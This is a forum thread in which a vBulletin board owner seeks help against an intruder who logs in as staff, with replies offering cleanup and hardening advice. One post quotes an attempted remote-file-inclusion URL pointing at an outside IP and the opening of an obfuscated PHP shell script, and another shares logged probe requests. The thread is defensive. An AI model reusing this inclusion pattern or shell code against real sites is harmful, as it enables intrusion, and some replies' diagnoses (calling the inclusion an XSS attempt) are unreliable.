this morning around 5am i went to who is online and i saw someone using one of my test account on our board and where his ip should be only say server2 then i click on resolve ip and i get 127.0.0.1 i delete the test account and he was trying to login using different admin names from forum leader list .Then I make all admins regular users just to be safe .

this for me is the first time i get someone with a ip like that because 127.0.0.1 should be local host .or I wrong?

any idea where i should look first ?

Re-upload all the default vBulletin files to be on the safe side.

that IP is simple to use... someone with a website hosted on the same server as you are, using a shelled page... automated login via localhost access... basic, first thing a newbie hacker would do to trick a forum from phpBB...

Well, since there aren't any currently known security issues with vBulletin, as long as your passwords are secure and relatively complex and you follow the basic security tips given out on the official site this user shouldn't succeed...

Not necessarily. The bad guys always find the exploits first... For all you know, there could be an exploit in the new vBulletin, just not yet known ;)

Well if they were trying something tried on phpBB boards, then trying said technique on a vBulletin powered board, despite vBulletin being coded completely differently other than using PHP and MYSQL would not exactly make me think said 'hacker' was too competent.

That and I doubt Jelsoft would leave yet another security problem in vBulletin that somehow went undetected for months despite many great coders having used the software and probably would have reported any security problems they found...

that IP is simple to use... someone with a website hosted on the same server as you are, using a shelled page... automated login via localhost access... basic, first thing a newbie hacker would do to trick a forum from phpBB...
is there any way I could ban using that ip I mean 127.0.0.1 with out any side effect to my board?

Unless other users use that IP, no.

Well if they were trying something tried on phpBB boards, then trying said technique on a vBulletin powered board, despite vBulletin being coded completely differently other than using PHP and MYSQL would not exactly make me think said 'hacker' was too competent.

That and I doubt Jelsoft would leave yet another security problem in vBulletin that somehow went undetected for months despite many great coders having used the software and probably would have reported any security problems they found...

I never said there is a security issue. I said 'there' could be ;)

As I've said, exploits are always found by the bad guys first. Not every security issue is that noticeable, even with quality coders using vBulletin.

OK today he finally got a hold of my user account since he can only log as a user but cant can to control panel since we have a second password to it .
also he did same thing in our second site .

he post in our staff area that he using a sql injection i am in the process of remove same hacks install in both sites to see if that help.

server login was change ,ftp login was change basically all password was change and i ban ip 127.0.0.1 now will re upload all vb files again .

anything i forgetting ?

Just disable the plugin/hook system and re-upload all vBulletin non-image files. This will then make your forums use to the vBulletin core code.

If the login to the server was changed, it indicates an issue with the server, not vBulletin.

If the login to the server was changed, it indicates an issue with the server, not vBulletin.

sorry i know my English is bad what I mean I did all those change to prevent or make sure he don't get a hold of server .

I remove this hacks today because they was in both of my site so i think one of them maybe was the way he find in .

inferno shout box
login as user
arcade
google search tag
who is on chat
hide hack

trying to be safe and not sorry . the hacker and me been at war for days today seen he give up or took a day off .


is there any way I can hide with a password the follow tools from admincp :
generate email list
email members
forum manager

update
we change all server password ,vbulletin password ,we change location of admincp and remove links from forum to admincp (only site owner and i know link ),we hire a server tech to harden server ,we disable all hacks ,reupload vb original files and this guys still can log as post as anyone from staff .
I change my password everyday and still can post as me too .

any ideas where else to look ?

Are you sure they haven't uploaded any malicious files?

Are you sure they haven't uploaded any malicious files?


OK i will delete everything on server except for sql ,avatars,profiles picture attachment and a few php file I wrote my self (extra pages) and will re upload all vb files .

to make sure that no file we did not upload is there .

I have a guest on my site that is viewing an error message. This is the guests location:

/forums/showthread. php?t = http://64.15.67.17/~calebsbi/logo.jpg

I added some spaces, not sure if posting the link is OK here or not, but it is not a link to a .jpg, it is some type of script. I reported abuse to the host of the account, so I am not sure how long the link will work for.

Here is how it starts out. I am removing the first character so it will show here. (I hope)

? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); function hc8a89c2c306fb($p341be97d9aff9) { $p341be97d9aff9 = str_replace(" ", "", $p341be97d9aff9);
return $p341be97d9aff9; } function ub5d21085bf2c0($p341be97d9aff9) { $p341be97d9aff9 = base64_decode(hc8a89c2c306fb($p341be97d9aff9));
return $p341be97d9aff9; } $oec12e0af93cb5 = array ( "po"

It's a pretty long script.

~Chuck

I guess thos was a failed attempt to do a XSS attack on your forum.

Thanks for the reply Marco. I am guessing it may have been a bot as it stayed around for hours, even after I turned off the Forums for an hour.

~Chuck

i find this on my logs after hacker try again maybe someone could tell me if he trying a injection and how to block it.

2008-08-05, 14:25:57, 1217946357, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:43:24, 1217947404, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as% 20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:43:59, 1217947439, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as% 20string, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:47:52, 1217947672, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%1as%2 0string, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 15:01:31, 1217948491, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 20:27:26, 1217968046, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as% 20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

He's trying but probably is miserably failing.
I suggest you just block the IP in .htaccess

Deny from 64.7.132.147

he still after all my forum i just open a new one and was clean no mods when he went there and still log as anyone he wanted but this time he got a surprise the admincp have htaccess password and is long.

that right there let me know he dont have ftp to server he just use sql injection .
i know vb is solid but maybe he discover a way in not sure.
he also use anonymus proxy .

lol looks like hes trying to hack you using Visual Basic

i wouldnt worry about him if hes trying to do that :p

lol looks like hes trying to hack you using Visual Basic

i wouldnt worry about him if hes trying to do that :p
haha good point. :p

PHP is the only thing you should be worried about (as extension is .php)

if you are using arcade or some hack that's require 777 chmd that is very risky anyone can defaced your website or even can have password of your cpanel. so just check it again